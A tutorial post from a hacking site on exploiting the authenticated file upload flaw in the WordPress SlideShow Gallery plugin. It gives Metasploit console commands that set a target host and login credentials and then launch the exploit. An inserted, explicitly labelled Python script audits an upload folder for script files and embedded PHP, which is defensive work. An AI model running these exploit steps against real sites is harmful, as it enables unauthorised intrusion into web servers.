The WordPress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An attacker who can log in to WordPress can upload arbitrary files to the upload folder. Because the plugin uses its own file upload mechanism instead of the WordPress API, any file type can be uploaded.
Exploit Targets
WordPress
Requirement
Attacker: Kali Linux
Victim PC: WordPress
Open a terminal in Kali and type msfconsole
Now type use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit (wp_slideshowgallery_upload) > set targeturi /
msf exploit (wp_slideshowgallery_upload) > set rhost 192.168.0.104 (IP of Remote Host)
msf exploit (wp_slideshowgallery_upload) > set rport 80
msf exploit (wp_slideshowgallery_upload) > set wp_user user
msf exploit (wp_slideshowgallery_upload) > set wp_password bitnami
msf exploit (wp_slideshowgallery_upload) > exploit
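A defender-side check for the condition described at the top of the page, where any file type can land in the upload folder: the script below is an added example, not code from the original post or from the plugin, and it walks an upload directory and flags everything that is not a plain image. The extension lists, the 1 MiB read limit and the sample files are assumptions made for illustration.

```python
import os
import re
import tempfile

# Assumed list of suffixes a PHP host may hand to the interpreter; match your server config.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif", "webp"}  # assumed allow-list for slide images
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)     # heuristic content marker

def classify(name, data):
    """Return the findings for one file name and its leading bytes."""
    if name.lower() == ".htaccess":
        return ["htaccess-override"]      # can remap which files the server executes
    exts = name.lower().split(".")[1:]    # every suffix, so photo.php.jpg is caught
    findings = []
    if any(e in SCRIPT_EXTS for e in exts):
        findings.append("script-extension")
    elif not exts or exts[-1] not in IMAGE_EXTS:
        findings.append("not-an-image-type")
    if PHP_TAG.search(data):
        findings.append("php-code-in-content")
    return findings

def audit(root, max_bytes=1 << 20):
    """Walk root and return {relative_path: findings} for each flagged file."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                findings = classify(name, fh.read(max_bytes))  # first 1 MiB only
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report

def demo():
    samples = {  # constructed files, made up for this example
        "slide1.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
        "banner.PHP": b"<?php /* placeholder */ ?>",
        "photo.php.jpg": b"\xff\xd8\xff\xe0",
        "logo.png": b"\x89PNG\r\n\x1a\n<?php /* placeholder */ ?>",
        "notes.txt": b"hello",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, data in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        return audit(root)

if __name__ == "__main__": print(demo())
```

Point audit() at the site's upload directory and review each flagged path; a clean image such as slide1.jpg produces no entry.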
The post Hack WordPress Server using WordPress SlideShow Gallery Authenticated File Upload appeared first on Hacking Articles.